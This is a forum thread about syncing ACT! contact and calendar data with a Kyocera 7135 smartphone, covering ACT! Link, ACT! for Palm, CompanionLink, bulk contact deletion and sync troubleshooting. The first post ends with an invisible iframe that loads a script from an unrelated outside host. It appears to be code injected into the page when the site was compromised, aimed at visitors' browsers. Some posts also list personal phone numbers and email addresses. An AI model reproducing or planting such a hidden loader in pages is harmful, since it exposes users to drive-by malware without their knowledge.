+ Reply to Thread
Page 1 of 2 1 2 LastLast

Hot Syncing the 7135 to ACT Database

The software that came with the 7135 phone doesn't sync with my act database. How can I sync my act managment system (including the date book) into my phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

companionlink

I have used link software to synch Act with my palm. Their website companionlink.com has decent support information about installing the software. When you load what application is critical, meaning, is Act installed, is palm hotsynch software installed and finally is Companionlink installed. They explain the issues and how to resolve problems.

What I like about Companionlink is the history attached to each contact name. Provides backup that is similar to viewing Act. On my Palm I also use Action Names. More robust than native palm contact application. I am interested to hear how you do. As soon as 7135's are available from VZ I plan on making the jump.
    Good Luck!

Syncing w/ACT

I went to act.com and downloaded the ACT Link 2.0, and it worked for me. Now, since I'm all new at this PDA thing, I need to find a quick and efficient way to delete about 650 contacts from my 7135!

A little FYI - Act! has announced that it is going to make the Act! for Palm OS available for Act! 2000. This is the Palm version of Act! and not just the link. Act! for Palm OS is a lot more complete. At the moment is says coming soon.

How to delete 650 contacts...
    Create an sync'able empty address book in Windows (Palm Desktop for instance)
    Go to your hot sync manager and choose "custom"
    Locate the contacts conduit and set it to sync your empty address book to the handheld.
    Now set it to "Desktop overwrites handheld"
    Sync
    Your 650 contacts will now be deleted from the handheld
    Change the settings on your contacts conduit to suit your new needs.

Leonid

Turbocat helped me out. All I had to do was delete the contacts in the Palm desktop and then resync with the ACT conduit disabled. Thanks everyone.

I was told by ACT support that if you intend to sync your ACT database with other users that you should not use ACT's Palm Link (due to possible database corruption) but the "ACT FOR PALM" software. I have a question in to tech support at Companionlink.com to see if their link is better. One think I'm hoping to avoid is too much add-on that slows down the palm functions.
    Cheers!

Frostie Dog

Companion Link told me no problem with multiple act users as well as using their conduit for ACT and 7135 Link. I used their 6035 profile and no problems yet. Next I will add the other users of the DB and start syncing the DB. They have a demo you can download at http://www.companionlink.com/download.htm
    Cheers!

Frostie Dog

I-300 Novice
    I use ACT! for Palm and ACT! Link 2.0.

Initially, when I loaded my ACT! database for ACT! for Palm, I had to set ACT! Link to the 'do nothing' setting'. I also had to set up a group for the ACT! for Palm synchronization, as I have a 2,100 contact database and it would continually freeze up doing the synchronization.

Once I put my most used contacts into a group (400 contacts) and synched it, it has been working fine. I now have both ACT! Link syncing the address and phone books and ACT! for Palm keeping my ACT! for Palm database on my 7135 up to date.
    Ahmed V. Ismail
    A Smartphone Addict

Ismail, Any way you could show a screenshot pic of how ACT for Palm looks on 7135? Thanks in advance if possible.

I-300 Novice
    If one of the techno gurus on the forum will tell me how to do it, I would be happy to put the screen shots off of my phone on the forum for you to see. I am not that techno-savvy.

There are four available screens in ACT!, it defaults (like in ACT! for your desktop) to 'my record'. If anyone else out there has found a way to get it to default to the daily calendar screen, please let me know.

Thanks.
    Ahmed V. Ismail
    A Smartphone Addict

Ahmed- Why have both the ACT link and ACT for Palm loaded? Is there an advantage to having both for the same information?
    Cheers!

Frostie Dog

I-300 Novice
    The only reason I have both running is that I cannot transfer my entire ACT! database (2,200 contacts) to ACT! for Palm. When I do, it freezes up during hot sync.

Because of this, I had to set up a group for ACT! for Palm, which is the only part of my database I sync to ACT! for Palm. I still want all of my phone numbers with me and want them accessible to TakePhone, so I use ACT! Link 2.0 to sync my phone numbers to the Palm address book.

If anyone has a way around doing this, I am all ears. It is just the way I was able to have all of my phone numbers with me and still keep my active contacts with their history in ACT! for Palm without it crashing all the time during hot sync.

Hope this makes sense.
    Ahmed V. Ismail
    A Smartphone Addict

Hi everyone.

I use Act 5.0 and Act Link 2.0 and it was working great "until" I upgraded my PC to Windows XP.

In the initial sync I sync'd my contacts and appointments in Act to overwrite the 6035 - it worked fine. Then I changed the conduit to sync between the two, 6035 and Act, for my contacts and appointmenst then it happened!

All of my contacts and appointments were duplicated twice!? I deleted my extra Act contacts easily enough, but how do I delete my extra appointments (is there an easy way to delete them)?

Did I do something wrong? Does anyone know of a problem with Windows XP and Act Link 2.0?

Any help would be great.
    Thanks to everyone in advance.

Dave

P.S. My Act! 5.0 setup: Single user. 131 contacts.

That happened to me a couple of times using
    Windows 2000 Professional. Is it possible that you have two palm conduits running? As for screening duplicates on appointments, you might see if the dup's have a different creation date and use ACT to delete them. Just a thought.
    Cheers!

Frostie Dog

Qcp 7135

Does the ACT Software intergrates with the QCP 7135????

and how much space does it use.
    John Castaneda
    CBStelecom
    914-762-9898
    914-762-8833
    E-Mail john@cbstelecom.com
    www.cbstelecom.com
    www.cbswireless.com

vac

ACT! for Palm OS - won't install

I can't seem to get the ACT! for Palm OS to install. When I press the sync button on the cradle it goes through a typcail sync but the software does not get loaded on the 7135 as the ACT! software syas it will.

This is the first 3rd party software I am installing. What would prevent it from installing?

VAC

Administrator
    see if their is an updated version of the software for the 7135.

are your conduits set up properly for installing/syncing applications?

vac

ACT for Palm OS crashes and too slow

I installed ACT for Palm on my 7135. I also have ACT 6.0 on my desktop runnign Win98

1. I could not get it to auto dial the phone numbers from the adress book. - any suggestions?

2. it seemed bruitaly slow, every time I scroll thru from date to dat, it has to look for the asscoaited data records and would actually blink on the screen while doeing so. - any comments?

3. I like the screen images for the address book but can't dial from this which in my mind makes it useless. - any comments?

4. I like the 7135 screen view of the calendar day much better than the ACT

5. The calendar was too diffciult to work with if I wanted to simply put an appointments in. ACT requires every entry to be asccoiated with a contact. So I used "my record" but then the history on "my record" ends up huge. and will eventually suck up memory, etc.. - Am I missing something here??? Just want to put in a simple appointment sometimes

VAC

I would like to use ACT for Palm - without crashing and some better screen shots - email me offline to discuss

centoamici@yahoo.com

Act for Palm Rocks

You guys are totally missing the boat using Act Link or Companionlink with the 7135.

With Act version 6 (must be 6) and Palm for Act (a separate purchase both available at www.act.com) you have an awesome solution that works great.

Act for Palm has it's own contact list, schedule, etc. just like Act. I sync over 3500 contacts. You must download the updated ver 1.01 as it GREATLY improves speed and more importantly allows dialing of the phone from within the application.

Check out the Act web site, sync is fast too after the initial sync.

Great program. I have no affiliation with Act, just a happy user.

Rock
    Rock